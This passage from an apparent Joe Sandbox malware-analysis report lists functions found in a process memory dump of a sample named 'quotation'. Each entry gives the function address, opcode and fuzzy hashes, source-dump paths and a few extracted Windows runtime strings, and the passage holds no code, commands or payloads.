                                                                                  • Opcode ID: 194478ef848eee39d89ebca00a88a21989b711736c2002520f1b1e0b22ce9367
                                                                                  • Instruction ID: a62a41a5619e39a1130522efb752e2f03f1777f12a5eb57d7291f8b0ba7d0f08
                                                                                  • Opcode Fuzzy Hash: 194478ef848eee39d89ebca00a88a21989b711736c2002520f1b1e0b22ce9367
                                                                                  • Instruction Fuzzy Hash: D741E230A2564ADFDB15CF5DC880BAE7BB4FF84744F248069EA11DB295E3B5D940CB40
                                                                                  Function 012EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 8df0966a72ba3b167c9efc13c9eb1c72bbb6a2bfc214876bad3a9d965c94c0d1
                                                                                  • Instruction ID: 707e27c8c609e0b0a23ac376fea6a8b8932b8631a7ec4d564c03e282f29daec6
                                                                                  • Opcode Fuzzy Hash: 8df0966a72ba3b167c9efc13c9eb1c72bbb6a2bfc214876bad3a9d965c94c0d1
                                                                                  • Instruction Fuzzy Hash: F801D1B2260700AFD711DF14CE4AB2677E8F795725F058979A658C7190E374D804CB46
                                                                                  Function 012BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: f47c377436d8db4bdc931faa86800b8187bf1073e2af779dae036835f0d6bd48
                                                                                  • Instruction ID: 3ba26ed2b3691076853105f75bd86ec54c3243e3b57cb9bd930ac871067f5c3e
                                                                                  • Opcode Fuzzy Hash: f47c377436d8db4bdc931faa86800b8187bf1073e2af779dae036835f0d6bd48
                                                                                  • Instruction Fuzzy Hash: F2827D75E202198FEB25CFA8C8807EDBBB1FF48394F14816AEA59AB251D7709D41CF50
                                                                                  Function 01336420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 4990fe0e18e717ca7c37e15fe9dbb63717e6c79a8892212a1a92a1d975999e59
                                                                                  • Instruction ID: cbcc0e92827ec304f4edab70c40af003411c4dc617b9421a6e1cfacd366d881c
                                                                                  • Opcode Fuzzy Hash: 4990fe0e18e717ca7c37e15fe9dbb63717e6c79a8892212a1a92a1d975999e59
                                                                                  • Instruction Fuzzy Hash: 1D9171B1A50219BFEB21DF95CC85FAEBBB8EF45B54F114025F700AB191D774AA00CBA4
                                                                                  Function 0135E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
                                                                                  • Instruction ID: 342241e917494aa37e7134a3fc849f34fc3253f4abb707e14a68f6b771fd63b1
                                                                                  • Opcode Fuzzy Hash: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
                                                                                  • Instruction Fuzzy Hash: C291A132900649AFDB26AFA4DC44FEFFBB9EF45B44F100029FA01A7251E7749A01CB90
                                                                                  Function 012EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: b05e0f6b9978078ec2e3b225deac0b6d7141a3139d7a4dbedbe67d15c4f3a104
                                                                                  • Instruction ID: 16fa19332b501f8b283ba6732865d414c7e75d8becfa6165d94c6f41832566a0
                                                                                  • Opcode Fuzzy Hash: b05e0f6b9978078ec2e3b225deac0b6d7141a3139d7a4dbedbe67d15c4f3a104
                                                                                  • Instruction Fuzzy Hash: 497170B5E0022ACFDF28EF9CD591AADBBB1BF48714F14812EE905A7241E7719941CB50
                                                                                  Function 01354978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 5012d9d2b1ba29c2761bf548abc185bd1676b4e0d126b57f48b88024737c7c63
                                                                                  • Instruction ID: 4901c70bbd750949e591c43d62cdf5d106bdfa75e5c5793d24b97196e68300ea
                                                                                  • Opcode Fuzzy Hash: 5012d9d2b1ba29c2761bf548abc185bd1676b4e0d126b57f48b88024737c7c63
                                                                                  • Instruction Fuzzy Hash: E551C772D1022A9BDF58DFA9C840EEEBBB4AF04E58F054129EE51B7240E3349C41CBE0
                                                                                  Function 012CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: e7dae4bdded477019d512128e0befc83ea3246157a317c519d5623bf49953c31
                                                                                  • Instruction ID: 16b3b78df4fd30933f12e402838ab26d050c86716179f368523a755e477a7d6b
                                                                                  • Opcode Fuzzy Hash: e7dae4bdded477019d512128e0befc83ea3246157a317c519d5623bf49953c31
                                                                                  • Instruction Fuzzy Hash: 6641B3725283429BD724DA75C840B6FBBE8AF98B04F450B2DFB84E7180E774D908C796
                                                                                  Function 0132C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: 0fde36151f29732a972542b53cb2b2de5361da042ab1853461886307b081865a
                                                                                  • Instruction ID: 0c61a4fedc22aeee79cb401052985c949cdb7b2f39ab810b546ef6056ec36ff9
                                                                                  • Opcode Fuzzy Hash: 0fde36151f29732a972542b53cb2b2de5361da042ab1853461886307b081865a
                                                                                  • Instruction Fuzzy Hash: FE4116B1D1052DABDB21EA54CC84FEEB77CAB55718F0085E9EB08A7140DB709E89CF94
                                                                                  Function 01346B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: bf9bfcde5265b1164fc22516ddd37b6c1b9299d4a002b9096c4ec9dc939f34ae
                                                                                  • Instruction ID: 37fe4632a0d6ddd49b93469559a73158f741c6f47dca6c4dbc3557345eef6907
                                                                                  • Opcode Fuzzy Hash: bf9bfcde5265b1164fc22516ddd37b6c1b9299d4a002b9096c4ec9dc939f34ae
                                                                                  • Instruction Fuzzy Hash: D3312871A007599BEF22DF69C851BAEBBE8DF46708F50402CEA41AB282C775FC05CB54
                                                                                  Function 0132CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  • Opcode ID: 556fa1790f6097f92fecbd283e0e8e0f99e142a3c4379f9c967f32a6f52542d2
                                                                                  • Instruction ID: fe780fe7808014ad8da8e1bac71147bd838ca33f2eb072689cc148696bff3243
                                                                                  • Opcode Fuzzy Hash: 556fa1790f6097f92fecbd283e0e8e0f99e142a3c4379f9c967f32a6f52542d2
                                                                                  • Instruction Fuzzy Hash: 8231063690052AAFEB15EB59C855EBFFB74EF80768F014129EA05A7251D730DE04DBE0
                                                                                  Function 0133892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0133895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 0a9c088292fdb1c8e4881c433952846b6ee6adc67121b7096655780c0d136899
                                                                                  • Instruction ID: cc1afe68d3629347a761794f6308de304ace7109c5a100f3610894d697c7dc10
                                                                                  • Opcode Fuzzy Hash: 0a9c088292fdb1c8e4881c433952846b6ee6adc67121b7096655780c0d136899
                                                                                  • Instruction Fuzzy Hash: 8B0126322102059FE7246F59DCC4BEA7B79EFD539CF44066CF64226551CB20AC81C79A
                                                                                  Function 01352000 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8dceb39cd584f5161d1810f97dc7a834f94eae551e8e89c9b9afa0698e0e4606
                                                                                  • Instruction ID: 431288dbefd08cabc5d5b0668e3d06a5cdf915a57abb79e38b74440f88472100
                                                                                  • Opcode Fuzzy Hash: 8dceb39cd584f5161d1810f97dc7a834f94eae551e8e89c9b9afa0698e0e4606
                                                                                  • Instruction Fuzzy Hash: E942D276608341DBD7A5CF68C890E6BBBE5BF88B08F08092DFE8297251D770D945CB52
                                                                                  Function 01348158 Relevance: .6, Instructions: 617COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bafda856dc435d83b09a567b05f439ed43c4cde610e4de1477be4c65e36d26c3
                                                                                  • Instruction ID: fd9207ada9962d92e0dcfa175720e7a256bf1042118ec321ac3e87585dc13acd
                                                                                  • Opcode Fuzzy Hash: bafda856dc435d83b09a567b05f439ed43c4cde610e4de1477be4c65e36d26c3
                                                                                  • Instruction Fuzzy Hash: 86425C75E102198FEB25CFA9C881BADBBF5BF48314F1481D9E949EB242D734A981CF50
                                                                                  Function 012C2840 Relevance: .6, Instructions: 605COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17a785753a63428a3faae43116b62515b853af0f88b5a042fc286bfe877ea96c
                                                                                  • Instruction ID: 583d4510de25539a3edd263deee1165dc3a3b8273ecdb6af8802b6008ffa9051
                                                                                  • Opcode Fuzzy Hash: 17a785753a63428a3faae43116b62515b853af0f88b5a042fc286bfe877ea96c
                                                                                  • Instruction Fuzzy Hash: 463213B0A00759CFDB28CFA9C8457BEBBF6BF84708F24451DD5469B689DBB4A801CB50
                                                                                  Function 0135A118 Relevance: .6, Instructions: 591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a8eda5e83051fb2727a7f4f931fe875c6897a229cf193e32c5d5b08288a61d7e
                                                                                  • Instruction ID: 2b22b1e59be96afae3cd3992960801f9a87526f876692082267a10ae30886498
                                                                                  • Opcode Fuzzy Hash: a8eda5e83051fb2727a7f4f931fe875c6897a229cf193e32c5d5b08288a61d7e
                                                                                  • Instruction Fuzzy Hash: 4622E3702046558FEBA5CF2DC050B72BBF1AF44B4CF08865ADD868F686E335D552EB60
                                                                                  Function 012B6A50 Relevance: .5, Instructions: 548COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b83be4c147b45181f10677ac8cdb9d46b0532e7727a18e16ef6cfb52b7bfd04f
                                                                                  • Instruction ID: c349985869fde7e073fbb41f6bc4d2ef0efc2f56ab83504a1bf46360aea876bb
                                                                                  • Opcode Fuzzy Hash: b83be4c147b45181f10677ac8cdb9d46b0532e7727a18e16ef6cfb52b7bfd04f
                                                                                  • Instruction Fuzzy Hash: D532AB71A10206CFDB29CF68C480BEABBF1FF48314F148569EA56AB395DB74E841CB50
                                                                                  Function 012D4A35 Relevance: .4, Instructions: 423COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction ID: 90e2e0ceeed80270a6454e1324931dd3207aea68c3d5088c25362e85e7e24d01
                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction Fuzzy Hash: FAF19270E1024A9BDF19DF99C580BAEFBF5BF48714F048129EA41AB754E774E841CB60
                                                                                  Function 0134892B Relevance: .4, Instructions: 386COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48693767ddda9d9833cb5200d44cb2d25b57ac3b45148cdc8147a23bf8cb4672
                                                                                  • Instruction ID: 77876f911d1b672783978f11c10d574611b2a87c02e7ef8ce47c1849c3fddd83
                                                                                  • Opcode Fuzzy Hash: 48693767ddda9d9833cb5200d44cb2d25b57ac3b45148cdc8147a23bf8cb4672
                                                                                  • Instruction Fuzzy Hash: FED1D171E0060A9FDF15CFA9C841AFEB7F5AF88308F1881A9D955A7241D735F905CB60
                                                                                  Function 012B65D0 Relevance: .4, Instructions: 383COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 934c9cedcfbeeeb8c9b2e59336404b20200004bb93983f72b76e2e16c574e5a5
                                                                                  • Instruction ID: 518f392c9fa47a85dd789da0a75af697f7adbeaae874378ff162f19dbb0e5639
                                                                                  • Opcode Fuzzy Hash: 934c9cedcfbeeeb8c9b2e59336404b20200004bb93983f72b76e2e16c574e5a5
                                                                                  • Instruction Fuzzy Hash: 4FE1A171518342CFC715CF28C4D0AAABBE1FF89354F058A6DEA9587351DB31E905CB92
                                                                                  Function 012A8397 Relevance: .4, Instructions: 380COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5072576aaafce1201ae1c6b287480e835fa6eb587387f70fdc723cfec237266e
                                                                                  • Instruction ID: d615b5d0e7047855dadbbc1d4eb4dea413da927cfd0af6748af813fe6dea4c0f
                                                                                  • Opcode Fuzzy Hash: 5072576aaafce1201ae1c6b287480e835fa6eb587387f70fdc723cfec237266e
                                                                                  • Instruction Fuzzy Hash: 9AD1E375A2060ADBDB19DF28CC91ABABBF5FF54319F44462DEA12DB280E730D950CB50
                                                                                  Function 01338243 Relevance: .3, Instructions: 322COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: f06eea2da7c02acac7206cc8bf93d0fcb728527dd0663f95815a264c91749319
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: 1CB16274A00609AFDF24DF99C940AABBBB9FFC4308F14459DBA52D7790DA34E905CB14
                                                                                  Function 012C0535 Relevance: .3, Instructions: 300COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction ID: 8c18f7ed79c4eb93985dce810d004fd55b06da56da0c52911b4883e6f3c8dd1e
                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction Fuzzy Hash: ACB12335620646EFDB19CBA8C840BBEBBF6BF84704F144268E6429B385D730ED41CB94
                                                                                  Function 012B83C0 Relevance: .3, Instructions: 281COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee1de68cebaf441dc8c32213958ba333ca40157131dcad89b1b41ec888b4eba6
                                                                                  • Instruction ID: 6bafe1766e00eaff4a875493309a6762112193b1aff69cf09aa09ecd056d490a
                                                                                  • Opcode Fuzzy Hash: ee1de68cebaf441dc8c32213958ba333ca40157131dcad89b1b41ec888b4eba6
                                                                                  • Instruction Fuzzy Hash: 11C157742183418FD764DF28C484BABB7E8FF88348F44496DEA8987295D774E948CF92
                                                                                  Function 012AC427 Relevance: .3, Instructions: 280COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
                                                                                  • Instruction ID: aee3a83dfb0ecd7a22fc4261ee1dbb03cba2d016c0f5cf4418991f46dc674bdf
                                                                                  • Opcode Fuzzy Hash: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
                                                                                  • Instruction Fuzzy Hash: 99B16170A102668BDB25DF58D890BB9B3F5EF44704F4485EAE54AE7281EB709D85CF20
                                                                                  Function 012DE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
                                                                                  • Instruction ID: 639565843b90db65e83b0d2796a976c7376ba5187c4b923410a22db4494107d1
                                                                                  • Opcode Fuzzy Hash: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
                                                                                  • Instruction Fuzzy Hash: 14A13731E106599FEB26DB9CC844BAEBBB8BF00718F064225EB10AB2D5D7749D44CBD1
                                                                                  Function 012F0185 Relevance: .3, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
                                                                                  • Instruction ID: 184a788050ff9ad27fb7169921cb93c084fa9b8d18d09514e329e4b9072502df
                                                                                  • Opcode Fuzzy Hash: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
                                                                                  • Instruction Fuzzy Hash: 49A1D370B206269BEB25DF69C491BBAF7A6FF44328F04403DEB0597282DB74E801CB54
                                                                                  Function 01384500 Relevance: .3, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
                                                                                  • Instruction ID: fcf4c2395904cdbb9bb92badb20e44c4ac4ee952774b8fb07865406ba75b6f0f
                                                                                  • Opcode Fuzzy Hash: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
                                                                                  • Instruction Fuzzy Hash: 47A1CD72A20312DFC721EF28C980B6ABBE9FF58718F45062CF6459BA50D734E900CB91
                                                                                  Function 01382B57 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction ID: edcdc505bdfae12217251e3f108da0fe796f020ee3cd89e3306916fedaaded59
                                                                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction Fuzzy Hash: 14B13971E0061ADFDF19DFA9C880AAEBBB5FF48314F148129E918A7350D730A945CB94
                                                                                  Function 013360E0 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
                                                                                  • Instruction ID: 359a9d4433c018e2750364719491fd3088fd547fdd608490d9af5190ef899a1e
                                                                                  • Opcode Fuzzy Hash: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
                                                                                  • Instruction Fuzzy Hash: BA9194B1D0021ABFDB15CF68D885BBEBFB5AF88714F154159E610EB351D734DA008BA4
                                                                                  Function 012CE3F0 Relevance: .3, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
